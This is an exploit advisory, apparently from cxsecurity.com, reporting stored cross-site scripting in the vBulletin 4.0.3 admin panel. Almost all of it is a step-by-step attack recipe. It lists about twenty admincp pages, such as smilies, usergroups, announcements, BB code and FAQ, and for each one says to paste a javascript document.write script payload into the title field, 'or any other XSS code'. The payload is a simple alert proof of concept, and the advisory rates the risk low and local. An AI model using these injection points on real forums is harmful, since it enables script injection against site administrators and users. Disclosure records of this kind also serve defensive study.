vBulletin [4.0.3] adminCP Cross-Site Scripting

2010-05-06 / 2010-05-07
Credit: Ashiyane Digital Security Team
Risk: Low
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

########################################################################### # # # -:: vBulletin [4.0.3] adminCP Cross-Site Scripting :: - # # # # Exploit Title: vBulletin adminCP Cross-Site Scripting # # Date: 2010 # # Author:[ Ashiyane Digital Security Team ] [Cair3x] # # Software Link: http://www.vBulletin.com # # Version: 4.0.3 # # Tested on: vBulletin 4.0.3 # # Exploited : [ scriptplazza ] # ########################################################################### -:: Generic Smilies Manager => Add New Generic Smilies ::- Exploit : Go To ( http://127.0.0.1/vb/admincp/image.php?do=add&table=smilie ) Add a new title . use the following code as title name : -:: javascript://%0adocument.write('<script>alert(0)</script>') ::- Or Any Other Xss Code -:: Avatars Manager => Add New Avatars ::- Exploit : Go To ( http://127.0.0.1/vb/admincp/image.php?do=add&table=icon ) Add a new title . use the following code as title name : -:: javascript://%0adocument.write('<script>alert(0)</script>') ::- Or Any Other Xss Code -:: User Titles Manager => Add New User Titles ::- Exploit : Go To ( http://127.0.0.1/vb/admincp/usertitle.php?do=add ) Add a new title . use the following code as title name : -:: javascript://%0adocument.write('<script>alert(0)</script>') ::- Or Any Other Xss Code -:: User Reputations Manager => Add New User Reputations ::- Exploit : Go To ( http://127.0.0.1/vb/admincp/adminreputation.php?do=add ) Add a new title . use the following code as title name : -:: javascript://%0adocument.write('<script>alert(0)</script>') ::- Or Any Other Xss Code -:: User Reputations Manager => Add New User Reputations ::- Exploit : Go To ( http://127.0.0.1/vb/admincp/adminreputation.php?do=add ) Add a new title . use the following code as title name : -:: javascript://%0adocument.write('<script>alert(0)</script>') ::- Or Any Other Xss Code -:: User Profile Fields Manager => Add New User Profile Fields ::- Exploit : Go To ( http://127.0.0.1/vb/admincp/profilefield.php?do=add ) Add a new title . use the following code as title name : -:: javascript://%0adocument.write('<script>alert(0)</script>') ::- Or Any Other Xss Code -:: Usergroups Manager => Add New Usergroups ::- Exploit : Go To ( http://127.0.0.1/vb/admincp/usergroup.php?do=add ) Add a new title . use the following code as title name : -:: javascript://%0adocument.write('<script>alert(0)</script>') ::- Or Any Other Xss Code -:: Forum Announcements => Add New Announcements ::- Exploit : Go To ( http://127.0.0.1/vb/admincp/announcement.php?do=add ) Go To ( http://127.0.0.1/vb/amodcp/announcement.php?do=add ) Add a new title . use the following code as title name : -:: javascript://%0adocument.write('<script>alert(0)</script>') ::- Or Any Other Xss Code -:: Forum Notices => Add New Notices ::- Exploit : Go To ( http://127.0.0.1/vb/admincp/notice.php?do=add ) Add a new title . use the following code as title name : -:: javascript://%0adocument.write('<script>alert(0)</script>') ::- Or Any Other Xss Code -:: Forum Advertising => Add New Advertising ::- Exploit : Go To ( http://127.0.0.1/vb/admincp/ad.php?do=add ) Add a new title . use the following code as title name : -:: javascript://%0adocument.write('<script>alert(0)</script>') ::- Or Any Other Xss Code -:: Forum Manager => Add New Forum Manager ::- Exploit : Go To ( http://127.0.0.1/vb/admincp/forum.php?do=add ) Add a new title . use the following code as title name : -:: javascript://%0adocument.write('<script>alert(0)</script>') ::- Or Any Other Xss Code -:: Calendar Manager => Add New Calendar ::- Exploit : Go To ( http://127.0.0.1/vb/admincp/admincalendar.php?do=add ) Add a new title . use the following code as title name : -:: javascript://%0adocument.write('<script>alert(0)</script>') ::- Or Any Other Xss Code -:: Usergroup Manager => Add New Usergroup ::- Exploit : Go To ( http://127.0.0.1/vb/admincp/usergroup.php?do=add ) Add a new title . use the following code as title name : -:: javascript://%0adocument.write('<script>alert(0)</script>') ::- Or Any Other Xss Code . -:: User Rank Manager => Rank Type ::- Exploit : Go To ( http://127.0.0.1/vb/admincp/ranks.php?do=add ) use the following code as (OR you may enter text HTML is allowed) Text . -:: javascript://%0adocument.write('<script>alert(0)</script>') ::- Or Any Other Xss Code -:: BB Code Manager => Add New BB Code ::- Exploit : Go To ( http://127.0.0.1/vb/admincp/bbcode.php?do=add ) Complete All Required Fields And Enter Javascript Code in Title : -:: javascript://%0adocument.write('<script>alert(0)</script>') ::- Or Any Other Xss Code . -:: Scheduled Task Manager => Add New Scheduled Task ::- Exploit : Go To ( http://127.0.0.1/vb/admincp/cronadmin.php?do=edit ) Complete All Required Fields And Enter Javascript Code in Title : -:: javascript://%0adocument.write('<script>alert(0)</script>') ::- Or Any Other Xss Code -:: FAQ Manager => Add New FAQ Item ::- Exploit : Go To ( http://127.0.0.1/vb/admincp/faq.php?do=add ) Add a new title . use the following code as title name : -:: javascript://%0adocument.write('<script>alert(0)</script>') ::- Or Any Other Xss Code . -:: Style Manager => Add New Style ::- Exploit : Go To ( http://127.0.0.1/vb/admincp/template.php?do=addstyle ) Add a new title . use the following code as title name : -:: javascript://%0adocument.write('<script>alert(0)</script>') ::- Or Any Other Xss Code


See this note in RAW Version
Vote for this issue:
0%
100%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top